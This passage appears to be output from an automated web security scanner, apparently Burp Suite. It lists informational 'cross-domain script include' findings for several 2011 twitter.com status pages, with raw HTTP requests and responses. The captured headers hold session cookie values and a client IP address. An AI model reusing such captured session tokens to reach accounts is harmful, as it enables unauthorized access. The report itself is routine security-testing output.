Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIjdodHRwOi8vdHdpdHRlci5jb20vbWFsc3VwL3N0%250AYXR1cy8yOTUxMDU1NjA2NzA0MTI4MDoMY3NyZl9pZCIlMDdlMWQxMGU0ZjM1%250AZDlmYjkzYjg3ZmNlYjkzYmExZDU6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3%250ANGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxh%250Ac2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8Mwt%250AAQ%253D%253D--141b7ea4243289f1bcdcfcdfe761c26559f23888; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/twitter.js?1296181726" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181726" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181726" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181726" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/geov1.js?1296181726" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/api.js?1296181726" type="text/javascript"></script>
...[SNIP]...

18.480. http://twitter.com/malsup/status/29705355999055872 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/malsup/status/29705355999055872

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181158
http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181158
http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296181158
http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296181158
http://a3.twimg.com/a/1296179758/javascripts/api.js?1296181158
http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181158
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

GET /malsup/status/29705355999055872 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:25:51 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296224751-25049-63292
ETag: "f4d24b4b0ce19c88101731df05975e44"
Last-Modified: Fri, 28 Jan 2011 14:25:51 GMT
X-Runtime: 0.26212
Content-Type: text/html; charset=utf-8
Content-Length: 13555
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIjdodHRwOi8vdHdpdHRlci5jb20vbWFsc3VwL3N0%250AYXR1cy8yOTcwNTM1NTk5OTA1NTg3MjoMY3NyZl9pZCIlNDAwZjBkMzA5YTgy%250AYzk1NGFhZGY3Y2YxMWZhNTEzNTI6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3%250ANGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxh%250Ac2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8Mwt%250AAQ%253D%253D--c0d59aed3199a40c6a1fc20a84673263ba8b0524; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296181158" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181158" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181158" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181158" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296181158" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/api.js?1296181158" type="text/javascript"></script>
...[SNIP]...

18.481. http://twitter.com/malsup/status/29705355999055872 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/malsup/status/29705355999055872

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903
http://a0.twimg.com/a/1296179758/javascripts/twitter.js?1296182903
http://a1.twimg.com/a/1296179758/javascripts/geov1.js?1296182903
http://a2.twimg.com/a/1296179758/javascripts/api.js?1296182903
http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182903
http://a3.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182903
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

GET /malsup/status/29705355999055872 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 17:07:00 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296234420-88697-41198
ETag: "d2e2198308508fbc4321dbe2f26bb933"
Last-Modified: Fri, 28 Jan 2011 17:07:00 GMT
X-Runtime: 0.06359
Content-Type: text/html; charset=utf-8
Content-Length: 13424
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7DDoOcmV0dXJuX3RvIjdodHRwOi8vdHdpdHRlci5jb20vbWFsc3VwL3N0%250AYXR1cy8yOTcwNTM1NTk5OTA1NTg3MjoVaW5fbmV3X3VzZXJfZmxvdzA6DGNz%250AcmZfaWQiJWFiYzQ1NWM5YjQ1NWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9u%250AYW1lIhRDZW50cmFsIEFtZXJpY2E6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3%250ANGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxh%250Ac2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8Mwt%250AAQ%253D%253D--c742841e736c0d120d0e73c3aa28ccfa29e67d46; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/twitter.js?1296182903" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182903" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182903" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/geov1.js?1296182903" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/api.js?1296182903" type="text/javascript"></script>
...[SNIP]...

18.482. http://twitter.com/malsup/status/29705355999055872 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/malsup/status/29705355999055872

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182306
http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182306
http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306
http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296182306
http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296182306
http://a3.twimg.com/a/1296179758/javascripts/api.js?1296182306
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

GET /malsup/status/29705355999055872 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:31:51 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225111-46886-40390
ETag: "be2e8a1c1b6d2015808fd3de2699ce73"
Last-Modified: Fri, 28 Jan 2011 14:31:51 GMT
X-Runtime: 0.05700
Content-Type: text/html; charset=utf-8
Content-Length: 13555
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIjdodHRwOi8vdHdpdHRlci5jb20vbWFsc3VwL3N0%250AYXR1cy8yOTcwNTM1NTk5OTA1NTg3MjoMY3NyZl9pZCIlY2U3Y2Q5MDVjNjU4%250AMzJiNWYyOTZjNWRmNGYxMjQzZWE6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3%250ANGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxh%250Ac2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8Mwt%250AAQ%253D%253D--089f16adbce34d7df374a5bdfa9b40d25d3e7204; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182306" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296182306" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/api.js?1296182306" type="text/javascript"></script>
...[SNIP]...

18.483. http://twitter.com/malsup/status/30065585396121601 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/malsup/status/30065585396121601

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182306
http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182306
http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306
http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296182306
http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296182306
http://a3.twimg.com/a/1296179758/javascripts/api.js?1296182306
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

GET /malsup/status/30065585396121601 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 17:06:48 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296234408-88044-3567
ETag: "1adee2ea84e20b6a09567f2281b31564"
Last-Modified: Fri, 28 Jan 2011 17:06:48 GMT
X-Runtime: 0.06860
Content-Type: text/html; charset=utf-8
Content-Length: 13514
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7DDoOcmV0dXJuX3RvIjdodHRwOi8vdHdpdHRlci5jb20vbWFsc3VwL3N0%250AYXR1cy8zMDA2NTU4NTM5NjEyMTYwMToVaW5fbmV3X3VzZXJfZmxvdzA6DGNz%250AcmZfaWQiJWFiYzQ1NWM5YjQ1NWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9u%250AYW1lIhRDZW50cmFsIEFtZXJpY2E6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3%250ANGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxh%250Ac2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8Mwt%250AAQ%253D%253D--06cbb09535ee3bb5451f1950e750e9a94cd36d6e; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182306" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296182306" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/api.js?1296182306" type="text/javascript"></script>
...[SNIP]...

18.484. http://twitter.com/malsup/status/30065585396121601 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/malsup/status/30065585396121601

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296179758/javascripts/api.js?1296181726
http://a1.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181726
http://a1.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181726
http://a2.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181726
http://a2.twimg.com/a/1296179758/javascripts/twitter.js?1296181726
http://a3.twimg.com/a/1296179758/javascripts/geov1.js?1296181726
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

GET /malsup/status/30065585396121601 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:25:47 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296224746-71315-7024
ETag: "53739e8689a75eb0e462fb3f46dbe87a"
Last-Modified: Fri, 28 Jan 2011 14:25:46 GMT
X-Runtime: 0.06652
Content-Type: text/html; charset=utf-8
Content-Length: 13645
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIjdodHRwOi8vdHdpdHRlci5jb20vbWFsc3VwL3N0%250AYXR1cy8zMDA2NTU4NTM5NjEyMTYwMToMY3NyZl9pZCIlNWViNDc0NjJhYjUy%250AYmJiMjUwZjk0ZjZiY2Q5NWQ2MjM6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3%250ANGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxh%250Ac2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8Mwt%250AAQ%253D%253D--a5345f31cffd9fbf70b4a6bddd83fd98f48576ba; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/twitter.js?1296181726" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181726" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181726" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181726" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/geov1.js?1296181726" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/api.js?1296181726" type="text/javascript"></script>
...[SNIP]...

18.485. http://twitter.com/malsup/status/30103594925555712 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/malsup/status/30103594925555712

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296179758/javascripts/api.js?1296181726
http://a1.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181726
http://a1.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181726
http://a2.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181726
http://a2.twimg.com/a/1296179758/javascripts/twitter.js?1296181726
http://a3.twimg.com/a/1296179758/javascripts/geov1.js?1296181726
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:31:44 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225104-20738-31700
ETag: "bd8e5417d2e9bee9786aa103ca950e1b"
Last-Modified: Fri, 28 Jan 2011 14:31:44 GMT
X-Runtime: 0.03425
Content-Type: text/html; charset=utf-8
Content-Length: 13787
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIjdodHRwOi8vdHdpdHRlci5jb20vbWFsc3VwL3N0%250AYXR1cy8zMDEwMzU5NDkyNTU1NTcxMjoMY3NyZl9pZCIlMWFjMzU3YWRiNjMy%250AMTkxYTFiOTVmZjIxOWM2MWFjMDY6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3%250ANGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxh%250Ac2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8Mwt%250AAQ%253D%253D--10e0f422c0565fd54016e2668bf0dc12c3549708; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/twitter.js?1296181726" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181726" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181726" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181726" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/geov1.js?1296181726" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/api.js?1296181726" type="text/javascript"></script>
...[SNIP]...

18.486. http://twitter.com/malsup/status/30103594925555712 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/malsup/status/30103594925555712

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181158
http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181158
http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296181158
http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296181158
http://a3.twimg.com/a/1296179758/javascripts/api.js?1296181158
http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181158
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:25:44 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296224744-39713-23366
ETag: "7bb96996c6739d3b30a2757944a67cce"
Last-Modified: Fri, 28 Jan 2011 14:25:44 GMT
X-Runtime: 0.05847
Content-Type: text/html; charset=utf-8
Content-Length: 13787
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIjdodHRwOi8vdHdpdHRlci5jb20vbWFsc3VwL3N0%250AYXR1cy8zMDEwMzU5NDkyNTU1NTcxMjoMY3NyZl9pZCIlZGQ5ZmU5ZmYzMGNm%250AMjhiMDY0MzgzM2U2NGNjMzJlMDY6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3%250ANGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxh%250Ac2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8Mwt%250AAQ%253D%253D--176b58f6205e5a5aa6ed8ffb4443a86e18553832; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296181158" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181158" type="text/javascript"></script>
